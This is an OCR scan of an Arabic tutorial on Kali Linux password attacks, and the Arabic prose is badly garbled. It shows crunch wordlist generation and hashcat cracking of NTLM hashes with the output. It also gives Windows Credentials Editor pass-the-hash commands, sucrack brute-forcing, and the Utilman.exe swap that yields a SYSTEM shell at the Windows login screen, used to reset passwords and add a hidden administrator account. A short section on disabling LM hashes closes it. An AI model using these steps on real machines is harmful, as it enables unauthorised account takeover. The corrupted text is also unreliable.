^gk aA j^slxJI j^i-Si o±^\ u^j p^ss ^ aWI ^AaJLaaj Ua^A CjLqI^IuiI l_ a^>su Ujl ^jiajiiij Ujli 6<JH<J1 J^f^ (^5^- 

^jlll (j-a ^j-ijjl l^-Jj pass CP" ^jW^ u j^j L -^^)^^ (>< ^ (JaxJ crunch cJ^*-^ .^-j <j^L^JI jj^J^ 

icPVIS 'newpasslist.txt t^jj ^ J^-^J .^j JjjL t*lli 

#crunch 6 6 -t pass%% -0 newpasslist.txt 
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root@JANA:~# crunch 6 


6 -t pass%% -o newpasslist 


.txt 




Crunch will now genera 


te the following amount of 


data: 7O0 bytes 




0 MB 








Q GB 








G TB 








0 PB 








Crunch will now genera 


te the following number of 


lines: 100 




100% 








root@JANA:~# 









l^-l^kVl l fll* (j-a (_£ ^3^^ ^J^l ojjj^II ^-laj .<i£-<uJI cA crunch ,>*VI ^ - &i L_aLJI ^ji^i l_a jjui 



oot@JANA:~# cat newpasslist.txt 

535500 

)ass01 

535502 

5ass03 
)ass04 
)ass05 
)ass06 
>ass07 
)ass08 
>ass09 
)assl0 
^assll 
3assl2 
)assl3 
)assl4 
)assl5 
>assl6 
)assl7 
}assl8 



Download Wordlists from the Web 

.CrackStationjSkull Security yr* W^j yr^ ^Slj-Jl J^at <> . ^ h^^ 1 ^ iC^j±^\ ^ ^j*vi 
Skull Security: 

https://wiki.skullsecurity.org/Passwords 
CrackStation: 

https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 



[ashcat and oclHashcat (Password Cracking with CUD A) 



i 



hashcat 

advanced 
password 
recovery 
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http : //hashcat.net/wiki : j^-a^ll 

t 8, w \\\ ^^utLi (j! La ^jU^VI ^J'J ■ JJ^*^ ( ** ^ al£ djUj£i3l ^ ^jAxJI A_iLi!ij LLaii <^5^ 

.(pass the hash) c>M jaj* 3 dVUJI o^xj j rainbow table 

^la^ Sasl! (Jj^j j o^istxJI jj^>^ ^ ^icj^ (Jj^jj (jl till .A^lSl! ^gk aJ jL^g (jj^ 10 J^' cs-^ l^ic-j^ cJ-^^ j 

?CUDA ^ u o^j CUDA ^ ^I^L-U 
Al^ yr^' -Sjjtj^l a^j^JI A^iio <jc SjUc ^ Compute Unified Device ArchitectureJ j^-aS^I ^ 

^Jj^Ja ^jC lA jJjIaJ ^aJ cJ^^ CjUIaslSI AjjA^JI A^LuJl Cj jj£ A-aJl» a\\ djl^. j) GPU * JJ^ * >n 130^ CP" 

Uj^I A^LuaaJ) j^ljc-bll l^l.Wi>«l SjjSII U3 ^lij Uui J£jjjj GPU 3->fl»^l % j$ ^bj| 4 dii jll jj>* j .(NVidia 

CUDA Cracking -4 



4 <; \ nAI j»c.Ai <jl ejakj .CPU 

AjC jjuj (j-d c fllajJaV) djI^jjuoC ^^>wjI j AjujUjoII d ljl£ Jjl j-a ^bVlmlj JJ^)^ dl A)\aC. 

ZjJjtf jal *bVl ^ CUDA cores ^ & ^ .V ji CUDA ^ 4;^ 



Hashcat and OclHashcat 

a^JUJI jl (GPU) j^^ ^Uaj (> J£ J^-^ jj^ ^^j^^ oclHashcatj Hashcat 

ciL ^UJI ^Jl AiUa, glLua ^Ixj ^ i GPGPUbased <^ OclHashcat o-^^ (CPU) 
djl£ ^jj c_bo^ CUDAHashcat-plus j^OclHashcat-plus ^fua ti cfi\ \J Uj^ diil£ j (GPU) 

dlj^l ^ Hashcat/oclHashcat .CPU Hashcat c> uj^ l^'j A^uai 

(jV .6^1 j ^ j*jt> a udl^ J^lk s^axIg djUJ£ ^j! j3j ^Axld ^jjjIa J^lsLill 1 ^ j£ aj (^jll (Multi Threating) dUlASLSI 

^I^jjojI Aic A jqjq^ll <c jjoJI j <OViun L_fl jjuj ^^jII j t^jjJal jxJl ^jAslSI lS^xjoij \ $ j£ tiL Aj^aLaJ) Aj j£^<Jl A^Jlx-<Jl 

jj^ > >n C5 li> <lj . jjuJI diUiK Jjuj^I 6 jSl! J£ ^l^klujl ^aJJ t^^al jaJI (j* dAlall J^xjujJ 1 g £ ciL Aj^aLaJl GPU .GPU *^ 

, jjj^JI ( >1 <J£ Jjuj^I Ijl^. ^Jj5 A-la^x» ^LujjV S^Axlxi jJ^ CjlaUail CIjLq jjuj^)1I A^Jlauo CjI^j S jS 

i^VI^ t^ja^il c> Hashcat/oclHashcat 

Attack modes 



i Brute-Force attack 
i Combinator attack 
i Dictionary attack 
i Fingerprint attack 
i Hybrid attack 
i Mask attack 
i Permutation attack 
i Rule-based attack 
i Table-Lookup attack 
i Toggle-Case attack 



Applications 
Applications 
Applications 
Applications 
Applications 



Kali Linux 
Kali Linux 
Kali Linux 
Kali Linux 
Kali Linux 



m mLs ^\ (j* J jj^s jll L ^&\ j Hashcat^ dljl^a] ^ ajaxJI ^Uaj jajj 



Password Attacks 
Password Attacks 
Password Attacks 
Password Attacks 
Password Attacks 



GPU Tools | oclhashcat-lite 
GPU Tools | oclhashcat-plus 
Offline Attacks | hashcat 
Offline Attacks | oclhashcat-lite 
Offline Attacks | oclhashcat- plus 
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iA a ikluLi c-hW^ ^ 4-9^*^ ^ ?^ *v ■ e^^VI l>* ^-3^)*^ ^ ^ ^ ; 6 HashcatcS^*-^ l_a jjuj ^jVI 

."hashcat —help" -M^S j JU*j3ll siaU ^ J^U <> Sgfo A\ cjIjL^JI lsjj jl ti&aj 

has heat, advanced password recovery 

Usage: hashcat [options] hashfile [mask |wordf lies | directories] 



Options 



* General: 

-ir., — hash-type=NUM 
-a, — attack-mode=NUM 
-V, — version 
-h, — help 

— eula 

— expire 

— quiet 



Hash-type, see references below 
Attack-mode f see references below 
Print version 
Print help 
Print EULA 

Print expiration date 
Suppress output 



; JIjII JUxijlill ^ jij 

#hashcat -m 1000 Easyhash.txt rockyou.txt -o cracked.txt 

JL£\ ^ y^. Easyhash.txt <NTLM <> * j^j t«Sa ajjj ^ill Jl$l\ jl (-m 1000) ^ 
cracked.txt I j^'j 6 j^^' & ^ l^^^L^ ^\ djUJill rockyou.txt * — to jA^j c*li ^jj ^ill 



rootgk-ri 1 1 : -/Desktop* hashcat 10Q0 Easyhash.txt rackyou.txt -o cracked.txt 
Initialising hashcat vE.44 by atom with 3 threads and 32mb segment -sJLze , 

tdd^d h^shei from f ilti Ea^yhash. tkt 1 13 [1 ^fLts] 

MOTE: press enter for status-screen 



fit! hashes have been recovered 
rootrnk-jl 1 : -/Desktop* T 



jSl^JI ^> sbVl <j c^alS U ^ jil cracked.txt 



. ^illj hashcat gfo jVl ^jSj 



rootQkali : ~/Desktop# cat cracked.txt 
b963c5701Gf218edc2cc3c229b5e4dEf :iloveyou 
259745cbl23a52aa2e693aaacca2db52 : 12345678 
5835O48ce94adQ564e29a924aO3510ef :passwordl 
5d95e3883afc84f 1842f8blc6d895fa4 : j esus 
f 773c5db7ddebef a4b9dae7ee8c50aea : t rust no 1 
6afd63afaebf 7421 101 0f02ba62alb3e :elizabethl 
a4f49c4O651Qbdcab6824ee7c30fdB52 : Password 
d5e2155516fld7228392b9©afd3cd539: Monkey 
43fccfa6bae3dl4b26427c26dG9410ef : f rancisl23 
dl449B6c6122blbl654ba39932465528 : Administrator 
9439bl42f2Q2437a55f7c52f6fcf82d3:luphu4ever 
27c Q555ea55ecfcdba01c 022681 dda3 f :duodinamico 
2e4dbf 83aa956289935daea328977b20 : P@$$wo rd 
root@kali : ~/Desktop# | 
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JJJ^I jJ i n£j obi ^1 ^Lal ^ a uaJ ^jl dlUJ^ll £>i& (j-a ^! ~1 laJL ui (jJjla (jc .2012 <^ l&jju£ ^^jll CjUJ^II 

.4-1^1531 (j-a £ L>^ jfi^ 

I^VI J .HaShCat cSf^ L-Jxj^a) JjoJI Cjl (J-g (J^asu ^^ic SjlaJ ^^llj U jCO 

31d6cfe0dl6ae931b73c59d7e0c089c0 
2e4dbf83aa056289935daea328977b20 
d6e0a7e89da72150dll52563f5b89dbe 
3 1 7a96a 1 0 1 8609c20b4ccb697 1 8ad6e7 
2e520e 1 822 8ad8ea40600 1 7234at43b2 

.hash.txt 



#hashcat -m 1000 hash.txt rockyou.txt -o hardcracked.txt 



11a ^L£i c_a jjoj ^1 C5 lc aijj Uua 



Input .Mod 


e; Diet 


[ rockyou . 


txt) 




Index 


. : 5/5 


(segment) , 


553995 [words) , 5 


72Q149 (bytes) 


Recovered 


1. : 2/5 


hashes, G/ 


1 salts 




Speed/sec 


. : 6.86 


M plains, 


6 . 86M words 




Progress . 


. : 553Q 


95/553095 


[100.00%) 




Running . . 


. \ i ~ 


_ - - _ _ 






Estimated 


1 . : - - : - 


-:--:-- 






Started: 


Tue Oct 


1 14:53: 


03 2013 




Stopped : 


Tue Oct 


1 14:53: 


67 2013 




root^kali 


: -/Desktop* 1 







root@kali:-/Desktop# cat hardcracked.txt 

31d6cfeQdl6ae931b73c59d7eQcG89c0: 

2e4dbf83aaQ56289935daea328977b20:P@$$word 



https://crackstation.net/buy-crackstation-wordlist-password-cracking-dic 

#hashcat -m 1000 hash.txt crackstation.txt -o hardcracked.txt —remove 

^ ls'^ crackstation.txt ^ rockyou.txt i> ^^1^31 liaS Vjl tjjLJI j*VI o& ou^ ^ Ja^iU 

(jfjl^il aLLLJI CjIaKJI Jj jj l_s jjoj <j| Ai^lAxJI ^ j^lill CjliLi ^ ^,v^ lau jU^Jl I^a j — remove j^f^^ ^l.^ n>iU U-<^ UjIj .^-La^jj 
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Input .Mode 


: Diet (crackst 


ation .txt] 


IhcIqx 


: 468/468 [sQgm 


ent), 453373 [words), 23198376 (bytes] 


Recovered . 


: 3/5 hashes, 6 


/l salts 


Speed/sec . 


: 6.94M plains. 


6 .94M words 


Progress . . 


: 453373/453373 


(100.00%) 


Running . . . 


■ 




Estimated . 






Started: Tue Oct 1 20:11 


:32 2013 


Stopped: Tue Oct 1 2Q:22 


:39 2013 


root^kali: 


-/Crack# | 





root@kdli :^/Crack# cat cracked.txt 
31d6cfe0dl6ae931b73c59d7eOc089cO: 
d6e0a7G89da7215Qdll525e3f5bS9dbG:MyNarreIsBob 
2G4dbf 83aa056289935daea328977b26 : P@$$wo rd 
root@kali:~/Crack# 



More advanced cracking 4- 

*^asl1<» ^1 jjl ^hviml till ^iij Hashcat 6 u*^ ^j^ 1 *" 1 < — * j j^' cjLj£i 

Multiple Wordlists 
Rule Sets 
Password Masks. 

S^Ll jj^JI jjo£3 ^^kiaiJI ^ ja^il ^ jj ^j^j] (-a) ^1. ^ i >> i l ^jjj dii^. (Attack type) ? £jj -1 

-U\^\ c^ljUiJl 

* Attack modes: 

0 = Straight 

1 = Combination 

2 = Toggle-Case 

3 = Brute- force 

4 = Permutation 

5 = Table-LaoJcup 

.saj^ cjUK *L£jV ^jj^ljall cjUK ^jj £a^JU t*U ^joij Combination Attack V l^-J^> 

Rule based attacks -2 

s^cta tilLiA JtLJI J^f^ c^c- . cjUJ£ jjoi^I l^l^kiujl sj (^Ij dinj ^^jll ^cl jill ^ hashcat ^ *j t8> y^ . ^ajLo ^^a 
^li^^j .leet-speak versions djL^lSJt t allk^ jl^-al J jUJ j UjUIs ^ j^Ull djUK J£ Iku ^sll ^1 jSII j "leet" 

j^xjII ^l^kiujU cjU^JI ^ j^I 11a ^ 4^UJI rulesets *U^V jJI Rule based attack ^ l^ajJ Liajl 

■^^J 2 rules ^ f5 (-r) 
:^Vl^ rules ^ jf^l (> 

Best64.rule, passwordspro.rule, d3ad0ne.rule, and leetspeak.rule 

http://hashcat.net/wiki/doku.php?id=rule based attack 
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Mask attacks -3 



i^Vl^ (Jj^j ciiia a I ikluj^U HashcatJ MASK »^aLkH L_flj^.Vl j j (j^j 

?d?d?u?u?u?u?u?u?s?s 



rikali:-/Crach# hashcat -m L0QQ -a 3 hash.txt ?d?d?u?Li?u?u?u?u?s?S -o Cracked 

.tfT 



:Mask attack ^^-^(Charset) ij^S&il jj* ^ Brute force attack c> ^ ^ 

Built-in charsets 



■ ?l = abcdefghijklmnopqrstuvwxyz 

■ ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ 

■ ?d = 01234S6739 

■ ?s = !"#$%&0*+,-./:;**?p[\] A _'{l>'" 

■ ?a = ?l?u?d?s 



<^Uu ^(custom charset) Va 1 > ^" Au 2 ^j^VI a^^^ ai^jI .(Charset) u ^j^Vi LjaJ v^jSaj 



.(1-n) ^1 U^j^j ^ LJUa ^jjj U£ (custom charset) ^ 



1 l>* ^ 



.(-l)jUJt ^^J? 



* Custom charsets: 

- 1 , — cus t am- chars e 1 1 =CS 

- 2 , — cus t om- chars e 1 2 =C5 

- 3 , — cus t om- chars e 1 3 =C5 
-4 , — cus t om- chars e 1 4 =CS 



User- defined charsets 
Example : 

— custam-charsetl=?dabcdef : sets charset ?1 to 012345 678 9abcdef 
-2 mycharset . hechr : sets charset ?2 to chars contained in file 



- 1 afcede f ghi j klmnapqr s t uvwxyz 0123456789 
- 1 abede f ghi j klmnapqr s t uwsyz ? d 
-1 710123456789 
-1 ?l?d 

-1 lower alphanumeric, hechr # file that contains all digits + chars (abedef ghi jklmnopqrstuvwxyz012345 678 9} 



Example 



The following commands creates the following password candidates: 



command: -a 3 ?1?1?1?1?1?1?1?1 
keyspace: aaaaaaaa - zzzzzzzz 



ccmirand: -a 3 -1 ?i?d ?1?1?1?1?1 
keyspace: aaaaa - 99999 



ccmirand: -a 3 passward?d 
keyspace : passwordO - passwords 



ccmirand: -a 3 -1 ?l?u ?l?l?l?l?l?119?d?d 
keyspace: aaaaaal900 - Zzzzzzl999 



ccmirand: -a 3 -1 ?dabcdef -2 ?l?u ?1?1?2?2?2?2?2 
keyspace: OOaaaaa - ffZZZZZ 



ccmirand: -a 3 -1 ef ghi jklmnop ?1?1?1 
keyspace : eee - ppp 



! - 1 chars e t s / s t andar d/ Ge rman/ de_cpl 252. hechr 
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OclHashcat 

L_fl<j all^dll <jujUja3l ^cSl- ^ alia all (Jjt.uuII ^cXS- 4_ijL^a ;tgiV jj^>^ ( ** il ^ CIjIj^VI ^jjojIj jSI 

Jj» ^aUaj (^Ic (Jasu Igil AiLjaVU .GPU ^l«^Luit Ig-AJcXL Igic t all^J I g £3 j hasilCat fibVl <-d^klab<Jl dljLaJl ^jjoij - laJLudJ 



d:\TOQls\oe~lHasbcat-l. 20>oe~lHasbcatG4, e*e hash -m 8300 -a 3 71 71 71 71 "?! 71 71 
□ clHashcat vl. 20 starting. . . 

Device #1: Hawaii, 3072MB „ lOOQHhz, 44HCU 

Hashes: 3. hashes; 3. unique digests, l. unique salts 
Bitmaps ; 3 bits, 2 5=6 entries p oxooooooff mask p 1024 bytes 
Ap p 1 i ca bl e opt i mi zers: 

* Zero- Byte 

* Not -It e r at ed 
w single-Hash 

* single-salt 

* Btute-For« 

Watchdog r Temperature abort trigger 5et to 97c 
Watchdog: Temperat ure retain trigger set to 95c 

7b^n7Hakq3r44Lblc2c^qbbatl5ba] 79r r . 1 vdsiq-fj - net : 3:31644 73 :a ^hashcat 



Session. Name. . . 
St at us ......... 

I nput . Mode . , , . . 
Hash, Target, , , - 
Hash, Type- 
Time. start ed. . . 
speed. GPU . #1.. . . 

Recovered. ... . . . . 

Pr ogress . . . . . 

Ski ppeok „ t + 

ftej ected. P T , , . . 



: oclhashcat 

: cracked 

: Mask C7l?"m7l7l?"l7"D 

: 7b5n?4kq3r44l.blc3 c5qbbatl5baj 7^r : . 1 vdsiq-f j . net : 331G44 ; 

: DNSSEC CNSEC^O 

: l sec 

: 1375. 5 MH/s 

: 1/1 CL^O-OOSO Digests, 1/1 O-OO. 00%) Salts 

: 93 5 3 70752/6031310176 £11., 6 3 SO 

: 0/S3 5 3 707 52 £0* 00%) 

: Q/93537Q732 CO.QQ30 

: Util, 5ec Temp, ZCf% Fan 



started: Sat Apr 2i 
stopped: Sat Apr 2i 



20:59:29 2014 
20:59^31 2014 



d : \t ool s\o c 1 Has be at -L. 2 o> 



Other Password Cracking Tools 

Password Unlocker Bundle available at http://www.passwordunlocker.com 

Proactive System Password Recovery available at http://www.elcomsoft.com 

Windows Password Cracker available at http://www.windows-password-cracker.com 

WinPassword available at http://lastbit.com/ 

Passware Kit Enterprise available at http : //www . lo stpas sword. com 

PasswordsPro available at http : //www. insidepro . com 

LSASecretsView available at http://www.nirsoft.net 

LCP available at http://www.lcpsoft.com 

Password Cracker available at http://www.amlpages.com 

Kon-Boot available at http://www.thelead82.com 

Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com 

Hash Suite available at http : / /hashsuite . op enwall . net 

S AMlnside available at http : //www . insidepro . com 

Windows Password Recovery available at http://www.passcape.com 

Password Recovery Bundle available at http://www.top-password.com 
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Krbpwguess available at http://www.cqure.net 

Windows Password Breaker Enterprise available at http://www.recoverwindowspassword.com 
Rekevsoft Windows Password Recovery Enterprise available at http://www.rekeysoft.com 



Windows Credentials Editor (WCE) 

http://www.ampliasecurity.com/research/windows-credentials-editor 
cjUU cJi^ j 4_*j1I31 J Ail^ajj J j^3! cjLuk j j^J sbt ^ Windows Credentials Editor (WCE) 
^^ic ilg^hviml (j^-GJ staVI *>i& .(kerberos j ^j^A* j^I j^I CjLoK ^lm / NT ) tgj <iajj^ll ^LucVl 

J cj^U^ <>) s jSlill <> NT/LM c>M cA- J ja^JI JjjL t jj^ijj ^ (pass the hash) c>M j^j* 3 4 Jliall 

jl jj^jjj ^Uaj ^ l^l^klojl D^lclj KerberOS J^lia C5 ic J jj^aJlj t(^Jl t^jl < . n£ ^lajai dlVU^ajl tdlAiaJlj ;4_Jclili3l 

ij tlluaja ^2003 6 C5^ (J^) JJ^J r*^^ C5^J -C^J^^ jW"^ (j^O^ jj^J <J*1 ~JJQ*^ (JW^ CJ J 1 ^ ga^Ldll <Jij 

.8 jj^j 2008 

.hashdump7 ISA^ ^ meterpreter 

. jjibj Jjisu^ill ^Uaj Ja*j j /usr/share/wce J^^\ ^ UalA\ tiA ^ a^uoij 

C:\cwe\> cwe.exe [options] 

:Jli* 

C : \wce\>wce . exe -o output . txt 

produces 



Administrator: WIN- D4CC3 6 9AeC5:E52CaC67419A9A224A3B10eF3FA6CB6D: 684 6F7EAZEeFB117AD0 6BDDe30B7Se6C 
willYbQY:WIN-D4CC3 6 9AeC5:AAD3E-435E-51404EEAAD3B435E-51404EE:31D6CFE0Dl 6AE931B73C59D7E0C089C0 
WIN-D4CC369ASC5$:ALDEID:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931E73C59D7E0C089C0 



^ b> 1 ^ ^ ^—^-^ ^4 * J^^" mimikatz staVI £>i& ^1 <jl t . 1^ j 
-1 List logon sessions and NTLM credentials (default). 

L£' UJ^ WCe l^Laai AiC ^^jJal jliaVI ^J^a j3l j& J ^ (j^aLkJl (jjilg-Ilj jjAlijll <J (Jj? ' ^ ^ L>^ ^-^^ lP 3 ^ 3 ^ f ^IjujJ 

-s Change NTLM credentials of current logon session. 

6^J^. CliljUj ^l^cl jl J^^ll (Jj^ > >nj ^ala (j-<Ui (j^X-^ ^Aa^Laid ^^^J ^ NTLM (JJJ^ J^*^ (*J^ 
WCC exe -5 lfier nafri -^rl-nm a tn ^- <1thVi a > -<nth a^>i^> 
For example: 
C :\Us ers\test>wce. exe -s 

testuser:ainplialab£:01FC5A6BE7BC6929AAD3B43 5B5 1404EE:0CB694SS05F797BF2A828079 
Changing credentials of current logon, session (0 0 0 24E 1 Bh.) to: 

U&enianie: testuser 
do mam: amplialabs 

LMHash : 0 1 FC5A6BE 7B C6929AAD3 B4 3 5B5 1 404EK 
XTHash: 0CB694S &05 F79 7BF2 AB2S0 7973 BE9537 
ZSTTLM credeixtials successfullv clxansed.! 
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How To Create A New Logon Session And Launch A Program With New NTLM 
Credentials? 



wce.exe -s <useniame>:^omain>:<lnihasli>:<nthash> -c <program> 
For example: 
C:\Users\test>wc:e_exe -s 

testuser:amplialab5:0 1FC5A6BE7BC6929AAD3B43 5B5 1404EE:0CB6948S05F797BF2A828079 
-c cmd.exe 

-r List logon sessions and NTLM credentials indefinitely. Refresh every 5 seconds if new sessions, 
-c Run in a new session with the specified NTLM credentials. 

-e List logon sessions NTLM credentials indefinitely. Refresh every time a logon event occurs, 
-o <file> save all output to a file. 

i^VI (jjj^ <>* ^ (4j NTLM £ jjII c> lA* 

wce.exe -g <cleartext password> 
For example: 

C:\Users\test>wce.exe -g mypassword 

WCE vl.2 (Windows Credentials Editor) - (c) 2010,201 1 Amplia Security - by Hernan Ochoa 
(hernan@ampliasecurity.com) 
Use -h for help. 
Password: mypassword 

Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

CmosPwd 

^u3! 4 JjS/j^ c*U ^il CmosPwd .(Basic Input Output System)BIOS jjj* ^ CmosPwd ^m** 

.CMOS fcUU j\ c^Us^VI 

Physical access attacks with sucrack 

. (Physical access password attacks) c^Ull Jj^jI! ^j^a iiiiil SUCrack i* ^ ^ 

cjLLu^ j^£3 (brute force attack) ^>l^l Sjall (multi threat) ^jULuJ! sbi ^ SUCrack 

LiA^C .llixa <j| CS"^ 6 (* J^£^ ^ .<-S^ ~ laJLui^ J-J jVI (JjxjolI] (ill ^ajujJ (JJJ^iJ (jgk SU ,>*VI .SU J-*^ * ^ all ^Ld^luixJl 

;l^l^kluj| Uj£ <lj cjI jlrk ajJ. SUCrack cJ^^I 
. SUCrack J *^L^JI <>aj*i ^ (—help) 

L_fllillVI J J^-^ J J J^"^ Jj> > ^IS ^ilt ^^kjjaixJl jj^-ilL till ^joaj (-1) 
<C5 il jj 3 cs-^J^*^ ^AslSI .CjUI > (J^ajC ^aJJ lAAjc j ^1 jjll ^^C ^nrJi] till ^joiJ (-§) 

.V ^1 ^.iki^j c ^i_uj ANSI escape ^ ^ (-a) 

.SUCrack ^ <oVinn ^jl (^ill CjUIaxJI a^c ^j^j] till ^joij (-w) 
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La s^txi J j^-^ Jj> > >n jl^-o diLjafl LoK c— iaia .ia.1 j ^l^kjjojl J > ^qj ^j£3 j j cj5 j J cjUL&«J) ^ ^jAxJI Sjbl SUCrack 

... JxD uL£ 

Siati ^lia .Uaa* <JLojj Jc Jj^a^i c_a jjoj ttilli L_a!>la> lie CjI aKH ^jI j3 Ale ( . i SUCrack^-^^ <J^ u-* -1 

icPVIS sucrack^Vl ijiiij Jliajjll 

#sucrack /usr/share/wordlists/rockyou.txt 

J c_je jjj 6 jljj 6 J£ cjUL-oa.VI o^j^ <js* j^j J u /1^ t j sucrack J*^> J ^! -2 

:g JU3l j^Vl ^l^iil A&*j t^l^ki^VANSI escape j 
#sucrack -w2-s6~a /usr/share/wordlists/rockyou.txt 

Bypass Windows Logons with the Utilman.exe Trick 

4.uiLui3l ^x&a cJ jll <>— ^ cl^j^ f i^LuiaH ^-Uijaii] a^iaj^i ^jj ? jjALj (Jjt.uuII ^Uaj J ajUj (j^iflajUtilman.exe 
(On Screen Keyboard) J^ ^iilLJI 4a.j3j 'Narrator j < (High Contrast Theme) c*^' ujW^' j 6 (Magnifier) 

J laill J) J ja.^1 » " >; 

o^cLoiaI] 4_alaJ! ^jj^ ^ i o 9 ji j Windows J] <J j^-^ 1 ^ J j» j 1 c alajja (jjill <jjjU3I s^qLuia] 11a a - 

J ^aJl (Jji^jaaj CjLAac jjlaJ (j-G L^-Lq ii£Luaj ^jl U3 (j^-<^ S^*-* ^-^j 43^- VI 1 ^^ia J^*^ u -0 

L-ali jl J ja.,^31 cJj> * ^ ^alaJI jjj-<Ji I jjoij ^ Uj!)Iac ^jl lij (JjaJI J ^ W^indows J j^-^^ cJj> * ^ jjW^ 
e J j^-^^ ' ci^ ^Uail! ^(nialware) a *^;^^ c^llulalll ^aL^JI ^ i^Lm*]! l-Lj^su daliLa 

liA dip. . Jj^j Jj^^^ U > (i^j^ c> Utilman u^3 uV li* lUs 

Utilman.exe^i^^ Jj^j lij . Windows\System32^V^^ ^'j^ l?^^ ci^i Utilman.exe J^-^ fj* 
.(system privileges) &\JJLa\ ^ j^ljVl Jj^ajll ja. A^ uj^ < cmd.exeJ^ j^i 

<xJaj| ^ root L-jLaiaJ] <BUui ^ ^1 j Jj^ijj Jj *j£ i3I ^Uaj cjI jLjlftl (system privileges) ^Uajlt CjI jLjIqI 

.linux 



fLuUl oIaj uLS 

. cmd.exeJ^ j^l ^Utilman.exe cjULJI ^Ikj J jU aL^ j JJ ^UaJ JS JjSj VJ 

^j-gj .^>a.l ^Uaj (slave) C5 O^J^ ^ W^j l fl^Loi^l ^Uail! (Jjt.uuII ^Uaj ^^Ic ^jlaJ ^^11 L-lL a\\ ^ajlll <!l jj ■ 

Uj^aJ U£ Live kali CD jt s^' ^l^i^l j UBCD4Win " \h ^ o- 3 ■ 

.8 jl 7 JVista Jj^j ls'^ CD jl DVD ^1 ■ 

^ ^ Live kali CD ^^^1 aJl£> UjLoj jUKj ^3 
c> JUj J jVl ^1^3! Jj J^j3l Windows 7 v> o- 3 ^ 1 DVD o-^J c> ."DVD 7 jj^j" 

.NEXT c3j3 JAjI t^iiUJl <a. j3 (jjmnj <1ax3Ij 



Repair your computer " jVl c3ja jajI t JiuJI jj^VI L_ulaJI J ^^1! Jiuil 44_JU3I <aij^ail J 
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^Uaj . "Use recovery tools that can help fix problems starting Windows" AAl * ji^JI 

.Next c3j^ t^Lajtall (j-a (Jjt.uuII ^Uaj Asu ;^-!>L^I (Jjt.uuII 



System Reoovery Optior 



Use recovery tools that can help fix problems starting Windows. 
Select an operating system to repair. 

If your operating system isn't listed,, dick Load Drivers and then 
install drivers for your hard disks. 



Operati . . . 



Partition Size 



Location 



Z5 2.*VY MB 



CPO Local Disk 



Restore your computer using a system image that you created 
earlier. 



Load Drivers 



j 



. (Command prompt)^ jVI Choose a recovery tool" 4^ ujV* 

j-ljVl SiaU" c^ja ^ jVI 

C:\ 

cd windows\system32 
ren utilman.exe utilman.exe.bak 
copy cmd.exe utilman.exe 

<^uaij iaL j±\ ^jojI Utilman.exe C5^^ c^LJI 4_lgjuij sjIcI system32 ^->^ ^ cj 

.c5^Vl Jj^ll L_aLJI ^ Utilman.exe ^ ^ cmd.exe 
<!I^1ujI Liajl o^ajj iaia ^L^VI j^u (jjjia jc- cmd.exe jVI ^ >^ Utilman.exe <-&JI JI^jIujI -ujIS s j£alt jl di^ 

^3 lil . 4-^. j>» ^^^ic <J jj^^JI ^1 c^^j Windows + U ^-^j^ t^-pUt Aij^UU jii j.ua£]| <J^*-^ ^^^^ 

(jl^ (Jjxju^j a j ^Ua ^j-<i # <J (Jj^ > uj <jujLuj ^Ijj j-al jVI ^-^j ^ Alt + Tab cjj^ 6 ^>^ j*^ ^-^ j - * j$ 
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Sj j^JI ( jj^i^luL4j A if\W\ jjj-aJI ^-aK (Jjjxj SjIc-I 

^i^^JjoixJU *L^aLaJI S^iuuJl CjliLJl J jj^ jll ^Iflj (iljli >s jj^ laajud^ L-jLudaJ JjJ-a (JjUxJ S^lcl aJ lil ; jj^j 

j£Ij cdlil .^h J^A? 

jjjirlj ^ jij L_fl jjuj 6<JHa3l I ^ (J^^ C-P^ J* ^^"^J JJJ-^ (jjJJLJ S^lcV 

. "hunter2' '^JohnDoe's jj^J! 

net user JohnDoe hunter2 
net user 

(J^IaJ! l_j jj^JI l^jflUiajj t(abcl23 ; jj^>^ j NewGuy i^vi^^l ^0 J*^' ^ ^ <^ ^^^^ l-jIju^ eXJ&y 

l^^ 3 j^*^ 

net user NewGuy abcl23 /add 

net localgroup Administrators NewGuy /add 

j^'jVl t utilman.exe*^l»^V 

C: 

cd windows\system32 
del utilman.exe 

ren utilman.exe. bak utilman.exe 

c_£1£j c^JjLuj Cj3 j ^ 4JLuuL lj^ ^ill Jji^Jl ^Vi< noil ljLua 4j| 

net user NewGuy /delete 

Server 

. J j^^ll ' ^ jj^ ^ lU^-*^ Mimikatz sbVI ^1 i^LujI Uiajl 

"sethc.exe" L -^- ( ^^j . jj^j^ J j^-^^ » ^ a.&\-& t^ll Liajl ^jujj <LLuJI <Ljia3l (jjaiij "Sethc.exe" t *^ c^-^- l!^'^*^^ 
lJ^juo Ij^i 4^1 jjII ^ cj! ^ o^Shift C5 1& c_j jjjJU lij 4<j^UJI ^UxJI jlLj .Windows Sticky Keys 
j j^ua ^utilman.exe ^ ^? ^ ^^J^ ft^^ .sticky key dialog box J gj* ls^jj 

^ ^^ic j^l jVI ^1 ^^jj <jU J j^"^ Jj> > >n 4_JjUi CjI j-<i (Jja^ shift L_jjjJa31 

LM Hash Backward Compatibility 

j Windows Server 2003 j Windows 2000 J^-^ ja LM Hash Backward Compatibility 

^ Kerberos ^^"^^ V Windows 95/98 . Jj^ijj cjljl^al J^^j ^ ^s-^ (j^^iu^l Ai^l^a-o 

(^Windows Server 2003 j 2000 jj^j 0^ 'Backward Compatibility J^' <> 

LAN Manager (LM) authentication 
Windows NT (NTLM) authentication 
NTLM version 2 (NTLMv2) authentication 

."LM hash" LM ^1^3! J^jjjjj . Kerberos j NTLMv2 'NTLMvl (Unicode hash) NT Hash ^ 

jli ^LM hash oj ^ lit .aSjLuJI CjI jl^VI ^ (Jalj^l J^l <> tUjjjjJa j£j ^ lil <LM hash oj ^ V 

. Jaljil lS^^ ^ (j^j^U jl Windows98 'Windows95 
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(How to Disable LM HASH) LM HASH *UUI hLl 



:^LM hash frlW J> Sjs j±j* 



(Implement the NoLMHash Policy by Using a Group Policy) Group policy ^l^lajU NoLMHash ijaS -1 

i^JUl! CjIjI^JI ^-fij 'local group policy ^ ti^j J^U ^> SAM LM hash j^ 2 J^*^ 

In Windows version -> In Control Panel -> Administrative Tools -> Local Security Policy -> Local 
Policies -> Security Options. 

In Windows server version -> In Group policy, select Computer Configuration -> Windows Setting 
-> Security Setting -> Local Policies -> Security Options. 

